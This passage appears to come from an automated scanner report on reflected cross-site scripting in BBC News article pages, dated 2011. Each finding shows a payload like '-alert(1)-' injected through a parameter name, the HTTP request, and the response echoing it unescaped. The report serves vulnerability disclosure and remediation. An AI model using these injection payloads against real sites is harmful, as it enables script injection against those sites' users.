Set-Cookie: BBC-UID=74fd25955e0ac5e94ab8f7a741c9a613e1440fada0b0811a948bcaa532d145f40Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:05 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=74fd25955e0ac5e94ab8f7a741c9a613e1440fada0b0811a948bcaa532d145f40Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:05 GMT; path=/; domain=bbc.co.uk;
Content-Length: 58389

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476185000,
       editionToServe: 'us',
       queryString: '20fd3'-alert(1)-'d9bcef9e45f=1',
       referrer: null,
       section: 'technology',
       sectionPath: '/Technology',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12419672',
       assetType: 'story',
...[SNIP]...

1.27. http://www.bbc.co.uk/news/technology-12429808 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/technology-12429808

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0afa'-alert(1)-'d75300cd789 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/technology-12429808?b0afa'-alert(1)-'d75300cd789=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:05 GMT
Keep-Alive: timeout=10, max=780
Expires: Sat, 12 Feb 2011 02:03:05 GMT
Connection: close
Set-Cookie: BBC-UID=d4bda5b5ce5a85b9ea2f4715e128467346f9d7bca090d19ae4cb8a94462c70740Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:05 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=d4bda5b5ce5a85b9ea2f4715e128467346f9d7bca090d19ae4cb8a94462c70740Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:05 GMT; path=/; domain=bbc.co.uk;
Content-Length: 55147

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476185000,
       editionToServe: 'us',
       queryString: 'b0afa'-alert(1)-'d75300cd789=1',
       referrer: null,
       section: 'technology',
       sectionPath: '/Technology',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12429808',
       assetType: 'story',
...[SNIP]...

1.28. http://www.bbc.co.uk/news/uk-12427839 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-12427839

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 37866'-alert(1)-'dde9ca8fcd7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/uk-12427839?37866'-alert(1)-'dde9ca8fcd7=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:06 GMT
Keep-Alive: timeout=10, max=715
Expires: Sat, 12 Feb 2011 02:03:06 GMT
Connection: close
Set-Cookie: BBC-UID=243de5d5cecaa5da9ae34505c13749dcdb196e609040c1ba94ebdaf6271467180Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:06 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=243de5d5cecaa5da9ae34505c13749dcdb196e609040c1ba94ebdaf6271467180Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:06 GMT; path=/; domain=bbc.co.uk;
Content-Length: 67564

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476186000,
       editionToServe: 'us',
       queryString: '37866'-alert(1)-'dde9ca8fcd7=1',
       referrer: null,
       section: 'uk',
       sectionPath: '/UK',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12427839',
       assetType: 'story',
       uri: '/news/
...[SNIP]...

1.29. http://www.bbc.co.uk/news/uk-12437244 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-12437244

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19795'-alert(1)-'154c8c787b8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/uk-12437244?19795'-alert(1)-'154c8c787b8=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:08 GMT
Keep-Alive: timeout=10, max=757
Expires: Sat, 12 Feb 2011 02:03:08 GMT
Connection: close
Set-Cookie: BBC-UID=240dd5455eea95fc5a5dd74f81e9f1b97318f2e70030f1699b4bc33e60fe34cc0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:08 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=240dd5455eea95fc5a5dd74f81e9f1b97318f2e70030f1699b4bc33e60fe34cc0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:08 GMT; path=/; domain=bbc.co.uk;
Content-Length: 55261

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476188000,
       editionToServe: 'us',
       queryString: '19795'-alert(1)-'154c8c787b8=1',
       referrer: null,
       section: 'uk',
       sectionPath: '/UK',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12437244',
       assetType: 'story',
       uri: '/news/
...[SNIP]...

1.30. http://www.bbc.co.uk/news/uk-england-london-12438040 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-england-london-12438040

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3d141'-alert(1)-'2895036776c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/uk-england-london-12438040?3d141'-alert(1)-'2895036776c=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:08 GMT
Keep-Alive: timeout=10, max=784
Expires: Sat, 12 Feb 2011 02:03:08 GMT
Connection: close
Set-Cookie: BBC-UID=c48d65e5ce7a25bcfb587e66517d4352f2bd07b4104042e347bd83b47c08d3600Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:08 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=c48d65e5ce7a25bcfb587e66517d4352f2bd07b4104042e347bd83b47c08d3600Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:08 GMT; path=/; domain=bbc.co.uk;
Content-Length: 57031

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476188000,
       editionToServe: 'us',
       queryString: '3d141'-alert(1)-'2895036776c=1',
       referrer: null,
       section: 'london',
       sectionPath: '/England/London',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12438040',
       assetType: 'story',
...[SNIP]...

1.31. http://www.bbc.co.uk/news/uk-northern-ireland-12427112 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-northern-ireland-12427112

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 87a95'-alert(1)-'c787b57eb90 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/uk-northern-ireland-12427112?87a95'-alert(1)-'c787b57eb90=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:09 GMT
Keep-Alive: timeout=10, max=720
Expires: Sat, 12 Feb 2011 02:03:09 GMT
Connection: close
Set-Cookie: BBC-UID=443db5e5be0a653deaadecf151f92644528f02768080e1997bbb73ff53d5a3720Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:09 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=443db5e5be0a653deaadecf151f92644528f02768080e1997bbb73ff53d5a3720Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:09 GMT; path=/; domain=bbc.co.uk;
Content-Length: 54889

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476189000,
       editionToServe: 'us',
       queryString: '87a95'-alert(1)-'c787b57eb90=1',
       referrer: null,
       section: 'northern-ireland',
       sectionPath: '/Northern Ireland',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12427112',
       assetTy
...[SNIP]...

1.32. http://www.bbc.co.uk/news/uk-northern-ireland-12428837 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-northern-ireland-12428837

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ec18'-alert(1)-'d5960dff01f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/uk-northern-ireland-12428837?8ec18'-alert(1)-'d5960dff01f=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:10 GMT
Keep-Alive: timeout=10, max=690
Expires: Sat, 12 Feb 2011 02:03:10 GMT
Connection: close
Set-Cookie: BBC-UID=249d45759efa452e5b7aa627f1d599e0f85a64256050a1ca247b5a64228c64400Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:10 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=249d45759efa452e5b7aa627f1d599e0f85a64256050a1ca247b5a64228c64400Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:10 GMT; path=/; domain=bbc.co.uk;
Content-Length: 54978

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476190000,
       editionToServe: 'us',
       queryString: '8ec18'-alert(1)-'d5960dff01f=1',
       referrer: null,
       section: 'northern-ireland',
       sectionPath: '/Northern Ireland',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12428837',
       assetTy
...[SNIP]...

1.33. http://www.bbc.co.uk/news/uk-politics-12428814 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-politics-12428814

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71dcc'-alert(1)-'b39bd07503d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/uk-politics-12428814?71dcc'-alert(1)-'b39bd07503d=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:11 GMT
Keep-Alive: timeout=10, max=791
Expires: Sat, 12 Feb 2011 02:03:11 GMT
Connection: close
Set-Cookie: BBC-UID=a49d1505dedaf53f4b797d782145e408efb5812400c0b1aac45bba6421cc528c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:11 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=a49d1505dedaf53f4b797d782145e408efb5812400c0b1aac45bba6421cc528c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:11 GMT; path=/; domain=bbc.co.uk;
Content-Length: 63190

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476191000,
       editionToServe: 'us',
       queryString: '71dcc'-alert(1)-'b39bd07503d=1',
       referrer: null,
       section: 'politics',
       sectionPath: '/Politics',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12428814',
       assetType: 'story',
       
...[SNIP]...

1.34. http://www.bbc.co.uk/news/uk-scotland-12433015 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-scotland-12433015

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a68fe'-alert(1)-'701cf850c69 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/uk-scotland-12433015?a68fe'-alert(1)-'701cf850c69=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:11 GMT
Keep-Alive: timeout=10, max=767
Expires: Sat, 12 Feb 2011 02:03:11 GMT
Connection: close
Set-Cookie: BBC-UID=e4fd75d50e5aa5ffbb28a2a3516d0843ff98ec952040124387bd9a5078113b3a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:11 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=e4fd75d50e5aa5ffbb28a2a3516d0843ff98ec952040124387bd9a5078113b3a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:11 GMT; path=/; domain=bbc.co.uk;
Content-Length: 59146

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476191000,
       editionToServe: 'us',
       queryString: 'a68fe'-alert(1)-'701cf850c69=1',
       referrer: null,
       section: 'scotland',
       sectionPath: '/Scotland',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12433015',
       assetType: 'story',
       
...[SNIP]...

1.35. http://www.bbc.co.uk/news/uk-scotland-tayside-central-12433192 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-scotland-tayside-central-12433192

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82edd'-alert(1)-'453a1a57e2e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/uk-scotland-tayside-central-12433192?82edd'-alert(1)-'453a1a57e2e=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:12 GMT
Keep-Alive: timeout=10, max=770
Expires: Sat, 12 Feb 2011 02:03:12 GMT
Connection: close
Set-Cookie: BBC-UID=945d0525de2a76302a51e915e109e024eab6d840f0402119db3b9322776da9ee0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:12 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=945d0525de2a76302a51e915e109e024eab6d840f0402119db3b9322776da9ee0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:12 GMT; path=/; domain=bbc.co.uk;
Content-Length: 60388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476192000,
       editionToServe: 'us',
       queryString: '82edd'-alert(1)-'453a1a57e2e=1',
       referrer: null,
       section: 'tayside-and-central',
       sectionPath: '/Scotland/Tayside and Central',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '124331
...[SNIP]...

1.36. http://www.bbc.co.uk/news/uk-wales-12427865 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-wales-12427865

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b285d'-alert(1)-'59be79fc31d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/uk-wales-12427865?b285d'-alert(1)-'59be79fc31d=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:14 GMT
Keep-Alive: timeout=10, max=751
Expires: Sat, 12 Feb 2011 02:03:14 GMT
Connection: close
Set-Cookie: BBC-UID=a44dc5650e7ac6a2f63398247183e4a1c40848b460602233076dc3c50641b5360Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:14 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=a44dc5650e7ac6a2f63398247183e4a1c40848b460602233076dc3c50641b5360Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:14 GMT; path=/; domain=bbc.co.uk;
Content-Length: 58794

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476194000,
       editionToServe: 'us',
       queryString: 'b285d'-alert(1)-'59be79fc31d=1',
       referrer: null,
       section: 'wales',
       sectionPath: '/Wales',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12427865',
       assetType: 'story',
       uri: '
...[SNIP]...

1.37. http://www.bbc.co.uk/news/uk-wales-12433322 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/uk-wales-12433322

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f76bc'-alert(1)-'68e3f314177 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/uk-wales-12433322?f76bc'-alert(1)-'68e3f314177=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:14 GMT
Keep-Alive: timeout=10, max=800
Expires: Sat, 12 Feb 2011 02:03:14 GMT
Connection: close
Set-Cookie: BBC-UID=74fd25350e6a46c28b5940cc21d8c8cffe705b3d20d0b26357ada3944c28b3b00Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:14 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=74fd25350e6a46c28b5940cc21d8c8cffe705b3d20d0b26357ada3944c28b3b00Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:14 GMT; path=/; domain=bbc.co.uk;
Content-Length: 60202

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476194000,
       editionToServe: 'us',
       queryString: 'f76bc'-alert(1)-'68e3f314177=1',
       referrer: null,
       section: 'wales',
       sectionPath: '/Wales',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12433322',
       assetType: 'story',
       uri: '
...[SNIP]...

1.38. http://www.bbc.co.uk/news/world-12428938 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-12428938

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7d154'-alert(1)-'99e276b557c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/world-12428938?7d154'-alert(1)-'99e276b557c=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:15 GMT
Keep-Alive: timeout=10, max=743
Expires: Sat, 12 Feb 2011 02:03:15 GMT
Connection: close
Set-Cookie: BBC-UID=445da5b50ebab6438aefab435124fb8432de24d330e0410a443baa8406fc20a40Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:15 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=445da5b50ebab6438aefab435124fb8432de24d330e0410a443baa8406fc20a40Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:15 GMT; path=/; domain=bbc.co.uk;
Content-Length: 48555

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


